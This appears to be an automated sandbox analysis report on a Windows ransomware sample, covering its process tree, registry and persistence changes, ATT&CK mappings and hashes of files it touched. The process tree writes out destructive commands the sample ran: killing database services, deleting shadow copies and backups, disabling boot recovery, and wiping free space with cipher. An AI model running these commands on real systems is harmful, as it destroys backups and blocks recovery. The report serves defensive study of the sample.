Token: SeBackupPrivilege	2676	WMIC.exe
Token: SeRestorePrivilege	2676	WMIC.exe
Token: SeShutdownPrivilege	2676	WMIC.exe
Token: SeDebugPrivilege	2676	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2676	WMIC.exe
Token: SeRemoteShutdownPrivilege	2676	WMIC.exe
Token: SeUndockPrivilege	2676	WMIC.exe
Token: SeManageVolumePrivilege	2676	WMIC.exe
Token: 33	2676	WMIC.exe
Token: 34	2676	WMIC.exe
Token: 35	2676	WMIC.exe
Token: SeBackupPrivilege	1464	vssvc.exe
Token: SeRestorePrivilege	1464	vssvc.exe
Token: SeAuditPrivilege	1464	vssvc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3056 wrote to memory of 2628	3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe	29
PID 3056 wrote to memory of 2628	3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe	29
PID 3056 wrote to memory of 2628	3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe	29
PID 3056 wrote to memory of 2628	3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe	29
PID 2628 wrote to memory of 2580	2628	cmd.exe	31
PID 2628 wrote to memory of 2580	2628	cmd.exe	31
PID 2628 wrote to memory of 2580	2628	cmd.exe	31
PID 2628 wrote to memory of 2580	2628	cmd.exe	31
PID 3056 wrote to memory of 2552	3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe	32
PID 3056 wrote to memory of 2552	3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe	32
PID 3056 wrote to memory of 2552	3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe	32
PID 3056 wrote to memory of 2552	3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe	32
PID 2552 wrote to memory of 2772	2552	cmd.exe	34
PID 2552 wrote to memory of 2772	2552	cmd.exe	34
PID 2552 wrote to memory of 2772	2552	cmd.exe	34
PID 2552 wrote to memory of 2772	2552	cmd.exe	34
PID 2772 wrote to memory of 2540	2772	cmd.exe	35
PID 2772 wrote to memory of 2540	2772	cmd.exe	35
PID 2772 wrote to memory of 2540	2772	cmd.exe	35
PID 3056 wrote to memory of 2168	3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe	37
PID 3056 wrote to memory of 2168	3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe	37
PID 3056 wrote to memory of 2168	3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe	37
PID 3056 wrote to memory of 2168	3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe	37
PID 2168 wrote to memory of 2424	2168	cmd.exe	39
PID 2168 wrote to memory of 2424	2168	cmd.exe	39
PID 2168 wrote to memory of 2424	2168	cmd.exe	39
PID 2168 wrote to memory of 2424	2168	cmd.exe	39
PID 2424 wrote to memory of 2420	2424	cmd.exe	40
PID 2424 wrote to memory of 2420	2424	cmd.exe	40
PID 2424 wrote to memory of 2420	2424	cmd.exe	40
PID 3056 wrote to memory of 2444	3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe	41
PID 3056 wrote to memory of 2444	3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe	41
PID 3056 wrote to memory of 2444	3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe	41
PID 3056 wrote to memory of 2444	3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe	41
PID 2444 wrote to memory of 2144	2444	cmd.exe	43
PID 2444 wrote to memory of 2144	2444	cmd.exe	43
PID 2444 wrote to memory of 2144	2444	cmd.exe	43
PID 2444 wrote to memory of 2144	2444	cmd.exe	43
PID 2144 wrote to memory of 2136	2144	cmd.exe	44
PID 2144 wrote to memory of 2136	2144	cmd.exe	44
PID 2144 wrote to memory of 2136	2144	cmd.exe	44
PID 3056 wrote to memory of 1628	3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe	46
PID 3056 wrote to memory of 1628	3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe	46
PID 3056 wrote to memory of 1628	3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe	46
PID 3056 wrote to memory of 1628	3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe	46
PID 1628 wrote to memory of 2472	1628	cmd.exe	47
PID 1628 wrote to memory of 2472	1628	cmd.exe	47
PID 1628 wrote to memory of 2472	1628	cmd.exe	47
PID 1628 wrote to memory of 2472	1628	cmd.exe	47
PID 2472 wrote to memory of 1576	2472	cmd.exe	48
PID 2472 wrote to memory of 1576	2472	cmd.exe	48
PID 2472 wrote to memory of 1576	2472	cmd.exe	48
PID 3056 wrote to memory of 1032	3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe	50
PID 3056 wrote to memory of 1032	3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe	50
PID 3056 wrote to memory of 1032	3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe	50
PID 3056 wrote to memory of 1032	3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe	50
PID 1032 wrote to memory of 1740	1032	cmd.exe	51
PID 1032 wrote to memory of 1740	1032	cmd.exe	51
PID 1032 wrote to memory of 1740	1032	cmd.exe	51
PID 1032 wrote to memory of 1740	1032	cmd.exe	51
PID 1740 wrote to memory of 2412	1740	cmd.exe	52
PID 1740 wrote to memory of 2412	1740	cmd.exe	52
PID 1740 wrote to memory of 2412	1740	cmd.exe	52
PID 3056 wrote to memory of 2652	3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe	53

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1064
- C:\Users\Admin\AppData\Local\Temp\951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
  "C:\Users\Admin\AppData\Local\Temp\951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Adds Run key to start application
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:3056
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill \"SQL\"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2628
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c rem Kill \"SQL\"
      4⤵
      PID:2580
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2552
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2772
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sqlbrowser.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2540
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2168
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2424
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sql writer.exe
        5⤵
        Kills process with taskkill
        
        PID:2420
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2444
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2144
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sqlserv.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2136
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1628
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2472
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im msmdsrv.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1576
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1032
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1740
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im MsDtsSrvr.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2412
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
    3⤵
    PID:2652
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
      4⤵
      PID:2748
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sqlceip.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2016
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
    3⤵
    PID:2604
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
      4⤵
      PID:2348
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im fdlauncher.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1960
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
    3⤵
    PID:2040
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
      4⤵
      PID:2992
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im Ssms.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2328
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
    3⤵
    PID:1240
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
      4⤵
      PID:1684
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im SQLAGENT.EXE
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2196
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
    3⤵
    PID:2256
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
      4⤵
      PID:1464
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im fdhost.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1704
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
    3⤵
    PID:2212
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
      4⤵
      PID:2848
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im ReportingServicesService.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1836
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
    3⤵
    PID:324
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
      4⤵
      PID:816
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im msftesql.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:448
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
    3⤵
    PID:580
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
      4⤵
      PID:1396
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im pg_ctl.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2828
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe
    3⤵
    PID:564
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe
      4⤵
      PID:2388
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -impostgres.exe
        5⤵
        Kills process with taskkill
        
        PID:1128
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
    3⤵
    PID:1848
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
      4⤵
      PID:2232
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
    3⤵
    PID:844
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
      4⤵
      PID:1312
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
    3⤵
    PID:3000
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
      4⤵
      PID:1608
    - - C:\Windows\system32\net.exe
        
        net stop MSSQL$MSFW
        5⤵
        
        PID:1460
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$MSFW
        6⤵
        
        PID:1472
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
    3⤵
    PID:1924
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
      4⤵
      PID:1652
    - - C:\Windows\system32\net.exe
        
        net stop SQLAgent$ISARS
        5⤵
        
        PID:1896
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$ISARS
        6⤵
        
        PID:1552
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
    3⤵
    PID:1916
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
      4⤵
      PID:904
    - - C:\Windows\system32\net.exe
        
        net stop SQLAgent$MSFW
        5⤵
        
        PID:888
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$MSFW
        6⤵
        
        PID:932
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
    3⤵
    PID:2964
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
      4⤵
      PID:2948
    - - C:\Windows\system32\net.exe
        
        net stop SQLBrowser
        5⤵
        
        PID:2808
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLBrowser
        6⤵
        
        PID:1792
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS
    3⤵
    PID:2080
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS
      4⤵
      PID:1612
    - - C:\Windows\system32\net.exe
        
        net stop REportServer$ISARS
        5⤵
        
        PID:1984
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop REportServer$ISARS
        6⤵
        
        PID:984
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
    3⤵
    PID:1640
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
      4⤵
      PID:2060
    - - C:\Windows\system32\net.exe
        
        net stop SQLWriter
        5⤵
        
        PID:2188
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLWriter
        6⤵
        
        PID:2764
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
    3⤵
    PID:1972
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
      4⤵
      PID:2540
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin.exe Delete Shadows /All /Quiet
        5⤵
        Interacts with shadow copies
        
        PID:3048
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
    3⤵
    PID:2508
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
      4⤵
      PID:1700
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin delete backup -keepVersion:0 -quiet
        5⤵
        Deletes system backups
        
        PID:2348
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    PID:1988
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      PID:2424
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2852
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
    3⤵
    PID:2180
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
      4⤵
      PID:1516
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit.exe /set {default} recoverynabled No
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2576
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
    3⤵
    PID:2272
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
      4⤵
      PID:2436
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic.exe SHADOWCOPY /nointeractive
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2676
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
    3⤵
    PID:1420
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
      4⤵
      PID:1348
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
        5⤵
        Drops file in Windows directory
        
        PID:2916
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
    3⤵
    PID:884
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
      4⤵
      PID:1632
- - C:\Windows\SysWOW64\cipher.exe
    cipher /w:\\?\C:
    3⤵
    PID:1348
- - C:\Windows\SysWOW64\cipher.exe
    cipher /w:\\?\F:
    3⤵
    - Enumerates connected drives
    PID:2956
- - C:\Windows\SysWOW64\cipher.exe
    cipher /w:\\?\A:
    3⤵
    - Enumerates connected drives
    PID:2828
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 708
    3⤵
    - Program crash
    PID:1992
- C:\Users\Admin\AppData\Local\Temp\951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
  \\?\C:\Users\Admin\AppData\Local\Temp\951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe -network
  2⤵
  - Adds Run key to start application
  - System policy modification
  PID:2776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c pause
    3⤵
    PID:844

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100
1⤵
PID:1980

C:\Windows\system32\net.exe
net stop MSSQLServerADHelper100
1⤵
PID:2160

C:\Windows\system32\net.exe
net stop MSSQL$ISARS
1⤵
PID:2368
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop MSSQL$ISARS
  2⤵
  PID:1592

C:\Windows\system32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP
1⤵
- Deletes System State backups
PID:2772

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1464

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft Office\Office14\1033\EXCEL.DEV_K_COL.HXK

Filesize
1KB

MD5
5bb140f3175cb7f8406413aa8eea46b2

SHA1
2d0dc1916d0fb6c4d32c327e7241ff5d415148b4

SHA256
eb5896c693ae169031c8e3a01e93c0d5f3ddf3c675934d065c48c37930f88e45

SHA512
12840ff63af9a4ca26e8ec77174190b35ca4ff7b915f3a3b799096a2494da322f282f2b57fb6ff3d7edee0a0cf590e8b008ef22d581d18dc6844c51f23c12280

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GRAPH_F_COL.HXK

Filesize
1KB

MD5
eb00dfcb02bc94424e71972a576f9312

SHA1
2604f892cf2371d51dd4cbf4f112bdcf8327ac92

SHA256
036fbf726dce07413b2c09ec011a2f12379adfc51285d5756391587903ec52c4

SHA512
b782058c21d870d8c407d515cf129c80617aa618eb8ddc31617a83cf8f2d84d1e181f2a6330ab148ddf01cda0a16ef43ffd32de0ddb0b94560ea44ddf48375fd

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_OFF.GIF

Filesize
1KB

MD5
375021aee8f7f6c626fa60c67ba7fe16

SHA1
26110bd54c70d4dfafd6f425ea2c5fd3af426970

SHA256
c47db96d31b293ef3d359684f5074cd00464eee65566c88f33a7aa80e84e58c2

SHA512
7ee26eaa0ddc5ecc54d6f88f3b300bba7601a34be0c4922e400671849dcf58be1ae480ffb11a0788cca0b64bfdf4e11b7ac6e43872b3b3c0f08fa7bf7a89a17c

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightOrange\TAB_ON.GIF

Filesize
1KB

MD5
f322b05bc573622b15a1d5be6e51d044

SHA1
6c98a9f18b1a631c3b31a35c8cd07f99d19712f8

SHA256
569acaffd35ee573c995d9e6b000e4c61c4f2ac0248e6f9902a68c8c40d040ca

SHA512
3ca69d46c14539ce8329c20a96c9f93e9f7154b72688430c9167a777dc9ab766bc8168e8d66f2da7f32c50b998ab76405c72f815c717d008a47f5993f7a77897

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\WINWORD_F_COL.HXK

Filesize
1KB

MD5
873af0b561fe8dcb31b1747fdcc8cc80

SHA1
5a5f4053a35248ebf2e5d226d1122fbdd6c6c5ad

SHA256
5137e4dada48b8989b8e8a72d5cc483bc77b55936165afb0b2c5a2212275cd14

SHA512
2809b7b6af76bf9a51502b1ac2d001d391325e2fcf47d89d9a2b26f65f2f97edf35404fc653ef43bd3f0fd3c4704eea84db610ca133f0c25882de673a744d73d

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\WINWORD_K_COL.HXK

Filesize
1KB

MD5
cc7668ba5b28ccbedd0dbd617e3673ec

SHA1
715841483afc3e7597405464313f9b87d0490756

SHA256
6002730fe366befdcff4651b6e465fdc8276d41f8872186666b1413fe6c4dd94

SHA512
b78756a0a01313e6a30a52880628fd5412b371cf0194e08eea8d38b76f135edff3da1d70ed68c3da5dd5b373b58374bc811d849ca02b95f0471616f9273a781d

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\GB.XSL

Filesize
257KB

MD5
d82a886ef4e5072ad21271ac62a2ec3a

SHA1
f83ca5b1f1dd6fcaddb3ff6a3a5f35c8259e464e

SHA256
c62c4ad0ae15f242e4900bea039c1d5523c40913936be4c185a26499a9c38379

SHA512
6d2e048d524016e23e6b60a900479339ec3bb8fc683f6e9b2d9b3d0daeb576ff7e323b162979a1792b00460185c5ec683e0c89ddeb7b55e7af8645a43d98446e

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Biscay\TAB_OFF.GIF

Filesize
1KB

MD5
13dbab3f3166060811e3d96ac38b671a

SHA1
9221f765ce03c0d3dda9781edfce7bf0735b8a8b

SHA256
73d978f05b4a986a3255919da06f2281bb87b18381072bb14bb522dea35f77f9

SHA512
497c2bd8c4b022d73050bb89cc4dbb0ec26d671f5e089fdabc8313ed3033dcea5512dcd06a3fc83c566e3346bd3887eaf3f5172c6c62c9736edce300215eae8a

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Biscay\TAB_ON.GIF

Filesize
1KB

MD5
